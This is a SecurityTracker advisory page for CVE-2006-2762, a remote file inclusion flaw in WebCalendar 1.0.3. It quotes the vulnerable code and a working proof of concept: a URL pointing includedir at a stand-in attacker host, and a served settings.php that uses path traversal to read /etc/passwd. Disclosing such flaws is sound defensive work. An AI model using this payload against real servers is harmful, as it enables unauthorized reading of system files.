SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Calendar)  >  WebCalendar Vendors:  Knudsen, Craig
WebCalendar Include File Bug in 'includes/config.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016179
SecurityTracker URL:  http://securitytracker.com/id?1016179
CVE Reference:  CVE-2006-2762   (Links to External Site)
Updated:  Aug 25 2009
Original Entry Date:  May 30 2006
Impact:  Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 1.0.3
Description:  A vulnerability was reported in WebCalendar. A remote user can view arbitrary files on the target system.

The 'includes/config.php' script does not properly validate user-supplied input in the 'includedir' parameter. If register_globals is enabled, a remote user can supply a specially crafted URL to cause the target system to include files from a remote system which will be able to include files from the target system. As a result, the remote user can view arbitrary files with the privileges of the target web service.
Impact:  A remote user can view files on the target system with the privileges of the target web service.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.k5n.us/webcalendar.php (Links to External Site)
Cause:  Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  socsam@linuxmail.org
Message History:   None.

 Source Message Contents
Date:  Tue, 30 May 2006 18:31:12 +0000
From:  socsam@linuxmail.org
Subject:  WebCalendar-1.0.3 reading of any files

 
Version:    WebCalendar-1.0.3


Type:       Reading of any files


Description:

-----------------------------

includes/config.php:

line  64


if ( ! empty ( $includedir ) ) 

  $fd = @fopen ( "$includedir/settings.php", "rb", true );


......


while ( ! feof ( $fd ) ) {

  $data .= fgets ( $fd, 4096 );

 


$configLines = explode ( "\n", $data );


for ( $n = 0; $n < count ( $configLines ); $n++ ) {

......

    $settings[$matches[1]] = $matches[2];

......


$user_inc = $settings['user_inc'];

......


includes/init.php

include_once "includes/$user_inc";


Example:

---------------------------------------

index.php?includedir=http://attacker_host

where in attacker_host exists file settings.php , which content


 

<?php


    echo '<?php

# updated via install/index.php on Wed, 24 May 2006 09:29:55 +0300

Unimportant variables can be taken from original settings.php

user_inc: ../../../../../../../../../../../../../../../../etc/passwd

# end settings.php

?>';


?> 

 


Requirements

register_globals = On;


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2007, SecurityGlobal.net LLC